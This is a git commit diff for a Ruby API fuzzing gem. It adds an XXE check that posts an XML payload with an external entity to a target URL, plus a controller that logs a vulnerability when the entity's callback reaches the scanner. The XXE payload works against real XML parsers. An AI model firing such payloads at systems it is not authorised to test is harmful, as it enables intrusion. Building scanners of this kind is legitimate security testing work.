improvements

lalithr95 · lalithr95 · commit 530b5a4e4e88 · 2016-09-24T01:26:55.000-04:00
diff --git a/API_Fuzzer.gemspec b/API_Fuzzer.gemspec
@@ -29,6 +29,7 @@ Gem::Specification.new do |spec|
 
   spec.add_dependency 'http', '~> 2.0'
   spec.add_dependency 'activesupport'
+  spec.add_dependency 'rails', '>= 4.2'
   spec.add_development_dependency "bundler", "~> 1.12"
   spec.add_development_dependency "rake", "~> 10.0"
   spec.add_development_dependency "minitest", "~> 5.0"
diff --git a/app/controllers/ping_controller.rb b/app/controllers/ping_controller.rb
@@ -1,13 +1,18 @@
 class PingController < ActionController::Base
   def index
-    sha = params[:id]
-    scan = Scan.find_by_sid(sha)
-    scan.vulnerabilities.create!(
+    @scan = Scan.find(params[:id])
+    @scan.vulnerabilities.create!(
       status: 'HIGH',
       class_type: 'Vulnerability',
-      description: 'Possible XXE vulnerability in #{scan.url}',
-      value: params[:body]
-    ) if scan
-    render :ok
+      description: 'Possible XXE vulnerability in #{@scan.url}',
+      value: body
+    ) if @scan
+    render json: { status: :ok }
+  end
+
+  private
+
+  def body
+    @scan.parameters.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
   end
 end
diff --git a/lib/API_Fuzzer.rb b/lib/API_Fuzzer.rb
@@ -6,6 +6,7 @@
 require 'API_Fuzzer/xss_check'
 require 'API_Fuzzer/request'
 require 'API_Fuzzer/engine'
+require 'API_Fuzzer/xxe_check'
 
 module API_Fuzzer
   # Scans all the checks
diff --git a/lib/API_Fuzzer/engine.rb b/lib/API_Fuzzer/engine.rb
@@ -1,3 +1,5 @@
+require 'rails'
+
 module API_Fuzzer
   class Engine < ::Rails::Engine; end
-end
+end
diff --git a/lib/API_Fuzzer/xxe_check.rb b/lib/API_Fuzzer/xxe_check.rb
@@ -1,35 +1,43 @@
 require 'API_Fuzzer/vulnerability'
 require 'API_Fuzzer/error'
 require 'API_Fuzzer/request'
-require 'byebug'
 
 module API_Fuzzer
   class XxeCheck
 
     def self.scan(options = {})
       @url = options[:url] || nil
-      @params = options[:params] || ''
+      @params = options[:params]
       @scan_hash = options[:scan]
       fuzz_xml_params
     end
 
+    private
+
     def self.fuzz_xml_params
       return unless @params
-      body = @params.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
+      body = params_serialize.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
       payload = <<-XXEPAYLOAD
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
 <!ELEMENT foo ANY >
-<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/yoxxe" >]>
+<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/ping/#{@scan_hash}" >]>
       XXEPAYLOAD
       payload << body
-
       API_Fuzzer::Request.send_api_request(
         url: @url,
         params: payload,
         body: true,
         method: :post
       )
     end
+
+    def self.params_serialize
+      body = []
+      @params.keys.each do |key, value|
+        body << "#{key}=#{value}"
+      end
+      body.join('&')
+    end
   end
 end
